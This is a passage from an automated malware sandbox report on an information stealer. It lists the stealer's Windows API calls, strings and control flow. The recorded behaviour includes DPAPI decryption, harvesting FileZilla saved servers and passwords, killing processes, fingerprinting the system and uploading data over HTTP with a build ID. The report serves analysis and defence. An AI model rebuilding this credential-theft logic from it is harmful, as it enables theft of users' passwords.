                                                                                                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 02A1433C
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,steam.exe), ref: 02A1434E
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A14367
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                                                                          • String ID: steam.exe
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1799959500-2826358650
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7728f8681222aaafc9267baf97a15074159b567d03e82f2965ad6abc4bd33afb
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1f94b78dcbb27d7455f3cad44404965c35186f18cc9aaab6f09e92879d691127
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7728f8681222aaafc9267baf97a15074159b567d03e82f2965ad6abc4bd33afb
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F011674D411199BEB61DF649D49BEEB6F8BF09351F0002D5F909E2250DB308B41CF61
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 02A1447E
                                                                                                                                                                                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000128), ref: 02A1448E
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,?), ref: 02A144A7
                                                                                                                                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 02A144BA
                                                                                                                                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 02A144C9
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A144D0
                                                                                                                                                                                                                                                                                                                                                          • Process32Next.KERNEL32(00000000,00000128), ref: 02A144DE
                                                                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02A144E9
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2696918072-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a3e860801cecd441844c871a71857f0e54f035309026bd84409d6705e2b3f0ca
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e2f47330e91140567fb087d4abca652675578cafc5bffc0f5ab9df5c376bfa66
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3e860801cecd441844c871a71857f0e54f035309026bd84409d6705e2b3f0ca
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5115E35A40218ABDB219F64DC4ABEF7BF8BF49751F004595FD05E2140DF349A51CBA2
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          • GetKeyboardLayoutList.USER32(00000000,00000000,02A37812,?,?), ref: 02A12A68
                                                                                                                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 02A12A76
                                                                                                                                                                                                                                                                                                                                                          • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 02A12A84
                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 02A12AB3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 02A12B5B
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: /
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 507856799-4001269591
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d4126c130fc34069db6be0a835c30a16121410ed5bb383f9289b4bfa92103ced
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d901ecd4ae127174b3e7df9517b74993cc4e235575160658c74ebf496cf25eed
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4126c130fc34069db6be0a835c30a16121410ed5bb383f9289b4bfa92103ced
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE31E8B5D80238ABDB20AF64DD89B9EB3B9AF04310F1045E5AE19A7151CF74AE85CF50
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 02A133BA
                                                                                                                                                                                                                                                                                                                                                          • CoCreateInstance.COMBASE(02A34220,00000000,00000001,02A3C17C,?), ref: 02A133DD
                                                                                                                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(?), ref: 02A133EA
                                                                                                                                                                                                                                                                                                                                                          • _wtoi64.MSVCRT ref: 02A1341D
                                                                                                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 02A13436
                                                                                                                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 02A1343D
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 181426013-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 47b414535b204f5724bded179d0e6c6964c2b4a4e0ac23b28c09f4b27878cc05
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3f82913ace939c05676e2ae697fef890c225270102f04fe28128f982aae1c5e7
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47b414535b204f5724bded179d0e6c6964c2b4a4e0ac23b28c09f4b27878cc05
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D117670D4024AEFCF029FA4D8899AEBFB6BF49311F1444A9F106E7250CF308946CBA4
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,02A09456), ref: 02A092C9
• LocalAlloc.KERNEL32(00000040,02A09456,?,?,02A09456,?,02A0DC56,?,?,?,?,?,?), ref: 02A092DD
• LocalFree.KERNEL32(?,?,?,02A09456,?,02A0DC56,?,?,?,?,?,?), ref: 02A09302
Strings
Memory Dump Source
• Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: Local$AllocCryptDataFreeUnprotect
• String ID: DPAPI
APIs
• CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,00000000,0000000F,0000000F,?,02A0543A,?,?,?,?), ref: 02A13AD9
• GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 02A13AE6
• RtlAllocateHeap.NTDLL(00000000), ref: 02A13AED
Memory Dump Source
• Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateBinaryCryptProcessString
• String ID:
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 02A129A5
• RtlAllocateHeap.NTDLL(00000000), ref: 02A129AC
• GetTimeZoneInformation.KERNEL32(?), ref: 02A129BB
• wsprintfA.USER32 ref: 02A129D9
Memory Dump Source
• Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateInformationProcessTimeZonewsprintf
• String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3317088062-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4869412f01ab9377e344777f6443525e32bd5681dc952ba13d83ae75bdec70be
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9c611731fa620aa8d7d8b1fbcf97e8d32ec85a14d312234fbdcdf45404d99303
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4869412f01ab9377e344777f6443525e32bd5681dc952ba13d83ae75bdec70be
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADF0B471E402246BE7149B78AC4ABAB77E9BB04324F100655FD15D31C0DF709E148A92
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A013A9), ref: 02A128BB
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A128C2
                                                                                                                                                                                                                                                                                                                                                          • GetUserNameA.ADVAPI32(00000000,02A013A9), ref: 02A128D6
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: Heap$AllocateNameProcessUser
• String ID:
• API String ID: 1296208442-0
• Opcode ID: 74dc4bd83cf9aa5dcd56bc4f3a0b8fa696b9f0188676c70dc560280499faaad1
• Instruction ID: c263daba188f06b29f9a0928b4898420bfba0bab6bdee13330a96e281e9c6f16
• Opcode Fuzzy Hash: 74dc4bd83cf9aa5dcd56bc4f3a0b8fa696b9f0188676c70dc560280499faaad1
• Instruction Fuzzy Hash: ABD05BB5A40344BBD7005795DC4DE8A77BCD785715F000456F60AE2140DDF0D9498630
APIs
Memory Dump Source
• Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: InfoSystemwsprintf
• String ID:
• API String ID: 2452939696-0
• Opcode ID: 44006b328e82fe4160e255b67f8441007c7addbf9fb91c613739c0b0510b1e67
• Instruction ID: 7b0a2b2e2ea9045c2ab7afb544f7cdb631ac739fbbeb9d6e87ae610effa9de66
• Opcode Fuzzy Hash: 44006b328e82fe4160e255b67f8441007c7addbf9fb91c613739c0b0510b1e67
• Instruction Fuzzy Hash: 13E09270D5021C9BDB11DFA0ED45ADEB7FCAB08304F0005B5A905D3180DA70AF98CF81
APIs
• lstrcmpiW.KERNEL32(?,?,?,?,?,?,02A014F3,avghookx.dll,02A19D23), ref: 02A014CF
Memory Dump Source
• Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1586166983-0

                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A10
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A16
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A1C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04A2E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04A36
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A05441
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13AB9: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,00000000,0000000F,0000000F,?,02A0543A,?,?,?,?), ref: 02A13AD9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13AB9: GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 02A13AE6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13AB9: RtlAllocateHeap.NTDLL(00000000), ref: 02A13AED
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,02A37A3B,02A37A3A,02A37A37,02A37A2F), ref: 02A054B0
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A054D2
                                                                                                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A055E8
                                                                                                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 02A0562C
                                                                                                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A0565E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,",file_data,02A38A18,------,02A38A0C,?,",02A38A00,------,02A389F4,27536a38d3707b6600f28b9d7177a12c,",build_id,02A389DC,------), ref: 02A05B8F
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A05BA2
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02A05BBA
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A05BC1
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A05BCE
                                                                                                                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 02A05BDC
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,?,?), ref: 02A05BF1
                                                                                                                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 02A05BFE
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A05C0C
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 02A05C1A
                                                                                                                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 02A05C2D
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?,?,00000000), ref: 02A05C42
                                                                                                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(?,?,00000000), ref: 02A05C55
                                                                                                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 02A05C97
                                                                                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000007CF,?), ref: 02A05D4E
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,block), ref: 02A05D63
                                                                                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02A05D6E
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocateOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                                                                                                                                                                                                                          • String ID: ------$"$"$"$"$--$------$------$------$------$27536a38d3707b6600f28b9d7177a12c$ERROR$ERROR$block$build_id$file_data
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4232923880-1561498756
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d2739435df58083282d6ea042fa6102391e9b65c0f16ca228520677fdf866d9d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 8e4bc849087b1d00cef17cf750fb0e9e36612a7fc8ccd8c7ca2aa5e50ea8d51b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2739435df58083282d6ea042fa6102391e9b65c0f16ca228520677fdf866d9d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C42D772D8016D9ADF21EB21ED85BDDB3BABF00350F0585E1A94873161CE71AF969F80

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A13A59
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A09163
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0F752,?,?,?), ref: 02A0917A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0F752,?,?,?), ref: 02A09191
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0F752,?,?,?), ref: 02A091A8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A09148: CloseHandle.KERNEL32(?,?,?,?,?,02A0F752,?,?,?), ref: 02A091D0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A13A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A18680,?), ref: 02A13A93
                                                                                                                                                                                                                                                                                                                                                          • strtok_s.MSVCRT ref: 02A0F77A
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,000F423F,02A379E7,02A379D7,02A379D6,02A379D3), ref: 02A0F7C0
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A0F7C7
                                                                                                                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 02A0F7DB
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02A0F7E6
                                                                                                                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 02A0F81A
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02A0F825
                                                                                                                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,<User>), ref: 02A0F853
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02A0F85E
                                                                                                                                                                                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 02A0F88C
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02A0F897
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A0F902
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A0F916
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(02A0FCF9), ref: 02A0FA3E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: CreateThread.KERNEL32(00000000,00000000,02A18B15,?,00000000,00000000), ref: 02A18C85
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A18BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A18C8D
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrlen$lstrcpy$File$AllocCreateHeapLocallstrcat$AllocateCloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                                                                                                                                                                                                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1004949264-935134978
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 470ec215bc60778ac55de552249fa543520a8ad409cc7a41d98eb187dec82d77
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: bc3d0cf2a4c70ea2f6fd680068a8e481892870d79453a4656e9ef16e226fdb4e
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 470ec215bc60778ac55de552249fa543520a8ad409cc7a41d98eb187dec82d77
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30A11172D80219AFDF05EBA1ED8AA9E7BB5BF04750B100521FE01B3060DF75AA558F91

                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 1465 2a0f182-2a0f22d call 2a25490 * 4 RegOpenKeyExA 1474 2a0f233-2a0f25e RegGetValueA 1465->1474 1475 2a0f6b4-2a0f6ca call 2a01cce call 2a1e88c 1465->1475 1476 2a0f260-2a0f266 1474->1476 1477 2a0f283-2a0f289 1474->1477 1476->1475 1480 2a0f26c-2a0f27e RegCloseKey 1476->1480 1477->1476 1481 2a0f28b-2a0f291 1477->1481 1480->1475 1483 2a0f293-2a0f29f RegCloseKey 1481->1483 1484 2a0f2a5-2a0f2bd RegOpenKeyExA 1481->1484 1483->1484 1484->1475 1486 2a0f2c3-2a0f2e4 RegEnumKeyExA 1484->1486 1486->1476 1487 2a0f2ea-2a0f2f5 call 2a12143 1486->1487 1489 2a0f2fa-2a0f3d9 call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 RegGetValueA call 2a12265 call 2a121e9 call 2a02910 RegGetValueA 1487->1489 1508 2a0f429-2a0f450 call 2a12265 call 2a121e9 call 2a02910 1489->1508 1509 2a0f3db-2a0f427 call 2a1424c call 2a12223 call 2a121e9 call 2a02910 * 2 1489->1509 1520 2a0f455-2a0f565 call 2a12265 call 2a121e9 call 2a02910 RegGetValueA call 2a12265 call 2a121e9 call 2a02910 call 2a12265 call 2a121e9 call 2a02910 RegGetValueA call 2a12265 call 2a121e9 call 2a02910 StrCmpCA 1508->1520 1509->1520 1550 2a0f567-2a0f58c call 2a0ec8f 1520->1550 1551 2a0f5cd-2a0f632 call 2a12265 call 2a121e9 call 2a02910 RegEnumKeyExA 1520->1551 1556 2a0f590-2a0f5c7 call 2a12265 call 2a121e9 call 2a02910 call 2a1045e 1550->1556 1557 2a0f58e 1550->1557 1551->1489 1565 2a0f638-2a0f694 call 2a01ced lstrlen call 2a12143 call 2a18be6 call 2a02910 1551->1565 1556->1551 1557->1556 1579 2a0f696-2a0f6a2 RegCloseKey 1565->1579 1580 2a0f6a9-2a0f6af call 2a02910 1565->1580 1579->1580 1580->1475
APIs
• _memset.LIBCMT ref: 02A0F1B3
• _memset.LIBCMT ref: 02A0F1D3
• _memset.LIBCMT ref: 02A0F1E4
• _memset.LIBCMT ref: 02A0F1F5
